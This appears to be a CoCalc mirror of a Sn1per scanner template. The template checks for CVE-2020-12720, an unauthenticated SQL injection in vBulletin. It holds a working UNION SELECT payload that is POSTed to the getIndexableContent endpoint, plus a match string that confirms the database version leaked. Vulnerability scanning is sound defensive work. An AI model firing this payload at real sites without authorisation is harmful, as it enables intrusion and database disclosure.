Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
1N3
GitHub Repository: 1N3/Sn1per
 Path: blob/master/templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_3.sh
2969 views
1
AUTHOR='@xer0dayz'

2
VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 3'

3
URI="/vb5/ajax/api/content_infraction/getIndexableContent"

4
METHOD='POST'

5
MATCH="vbulletinrce"

6
SEVERITY='P1 - CRITICAL'

7
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\" "

8
SECONDARY_COMMANDS=''

9
GREP_OPTIONS='-i'

10